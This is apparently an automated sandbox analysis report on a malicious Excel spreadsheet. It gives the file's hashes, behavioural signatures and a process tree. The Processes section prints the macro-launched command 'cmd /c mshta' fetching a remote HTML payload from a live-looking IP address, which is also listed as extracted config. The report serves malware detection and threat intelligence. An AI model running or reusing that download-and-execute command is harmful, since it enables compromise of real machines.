Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20/11/2024, 09:59
Behavioral task
behavioral1
Sample
76cb28484132dc02ed1731f85cc45210303742a011e43fa47fdc66165badcd6e.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
76cb28484132dc02ed1731f85cc45210303742a011e43fa47fdc66165badcd6e.xls
Resource
win10v2004-20241007-en
General
-
Target
76cb28484132dc02ed1731f85cc45210303742a011e43fa47fdc66165badcd6e.xls
-
Size
76KB
-
MD5
8cc7297dda5f22780b22d5fa643b0da3
-
SHA1
a3aa519607c9bddbdde3ed525d880172df11f43c
-
SHA256
76cb28484132dc02ed1731f85cc45210303742a011e43fa47fdc66165badcd6e
-
SHA512
eb8c8cddcddea9e1f2cb70863ebfff2a23676a9bdc08440420cf1380dbbdb85625cac0e8fafd2e8f18f83e3c0d4867faf0925222e28583f47f83c887a9fb6361
-
SSDEEP
1536:1I+Hymsbck3hbdlylKsgqopeJBWhZFGkE+cMLxAAISQ5gQ72IotO6nitSU6U+x:1I+HymsYk3hbdlylKsgqopeJBWhZFGkz
Malware Config
Extracted
http://91.240.118.168/zzx/ccv/fe.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3032 4152 cmd.exe 82 -
Blocklisted process makes network request 1 IoCs
flow pid Process 22 4908 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4152 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4152 EXCEL.EXE 4152 EXCEL.EXE 4152 EXCEL.EXE 4152 EXCEL.EXE 4152 EXCEL.EXE 4152 EXCEL.EXE 4152 EXCEL.EXE 4152 EXCEL.EXE 4152 EXCEL.EXE 4152 EXCEL.EXE 4152 EXCEL.EXE 4152 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4152 wrote to memory of 3032 4152 EXCEL.EXE 86 PID 4152 wrote to memory of 3032 4152 EXCEL.EXE 86 PID 3032 wrote to memory of 4908 3032 cmd.exe 88 PID 3032 wrote to memory of 4908 3032 cmd.exe 88
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\76cb28484132dc02ed1731f85cc45210303742a011e43fa47fdc66165badcd6e.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4152 -
C:\Windows\SYSTEM32\cmd.execmd /c mshta http://91.240.118.168/zzx/ccv/fe.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\system32\mshta.exemshta http://91.240.118.168/zzx/ccv/fe.html3⤵
- Blocklisted process makes network request
PID:4908
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD5f0467a5ebf495e5af70043648c6ab5af
SHA144a19e7e8203cf3281a6471c347b09e62a52f1dc
SHA25689cd6f2fa742ca6e1c5cc127375810597b5462f911cdf4229df8322562d00227
SHA5126a32413608ade100195a81e9fa2289f44b55358164baf924ea3d73425791de8d4f895cd24adf2b22fadf09c03c3415b0acbf2da3be096470bdfdf918e07310bd